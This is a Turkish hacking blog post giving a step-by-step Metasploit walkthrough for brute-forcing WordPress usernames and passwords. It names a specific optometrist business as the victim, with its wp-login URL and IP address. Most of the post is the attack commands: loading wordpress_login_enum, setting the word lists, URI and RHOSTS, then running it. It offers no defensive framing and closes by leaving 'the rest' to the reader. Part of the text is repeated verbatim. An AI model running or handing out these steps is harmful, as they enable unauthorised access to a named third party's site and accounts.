Konu Wordpress Sitelerine Brute Force Yöntemiyle User ve Pass Bulma : )
Exploit : auxiliary/scanner/http/wordpress_login_enum
Kullanıcağımız Araçlar.
Pass list
User list
BackTrack.
Victim : Neovision ~ Optometrists Durbanville
Vİctim İp : 196.41.137.143
Hemen başlıyalım.
İlk önce tmp dizine pass list ve user list dosyalarını txt olucak şekilde atıyoruz.
Tmp Dizinene Ulaşmak İçin ==>> Places >> Computer >> File System >> tmp
Buraya user.txt ve pass.txt dosyalarını atıyoruz.

Şİmdi Terminal'i açıp msfconsole yazıyoruz. biraz gec acılabilir bekleyin.
msf > Bunu gördükten sonra ise ,
msf > use auxiliary/scanner/http/wordpress_login_enum Diyoruz.
Exploit : auxiliary/scanner/http/wordpress_login_enum
Kullanıcağımız Araçlar.
Pass list
User list
BackTrack.
Victim : Neovision ~ Optometrists Durbanville
Vİctim İp : 196.41.137.143
Hemen başlıyalım.
İlk önce tmp dizine pass list ve user list dosyalarını txt olucak şekilde atıyoruz.
Tmp Dizinene Ulaşmak İçin ==>> Places >> Computer >> File System >> tmp
Buraya user.txt ve pass.txt dosyalarını atıyoruz.

Şİmdi Terminal'i açıp msfconsole yazıyoruz. biraz gec acılabilir bekleyin.
msf > Bunu gördükten sonra ise ,
msf > use auxiliary/scanner/http/wordpress_login_enum Diyoruz.

Ardından siteye baglanıcaz http://www.neovisi on.co.za/wp-login.php şeklinde.
O yüzden;
set URI http://www.neovisi on.co.za/wp-login.php diyoruz.
O yüzden;
set URI http://www.neovisi on.co.za/wp-login.php diyoruz.

Şimdi pass ve user dosyalarını belirticez bunu için;
set USER_FILE /tmp/user.txt
set PASS_FILE /tmp/pass.txt

Sitenin ip adresini yazacaksınız.
ip'iyi yazıyoruz set RHOSTS 196.41.137.143 Ardındanda run diyoruz.

Şimdi o koyduğunuz user list doğrultusunda çalışacak.

ve pass.txt tuttugunda size böyle vericektir.

SAnırım Geri Kalanını Yaparsınız : )
Hayat BAckTrack'le Güzel : )
Th4 MasK
Bilinmezlik Diyarından.
Hiç yorum yok:
Yorum Gönder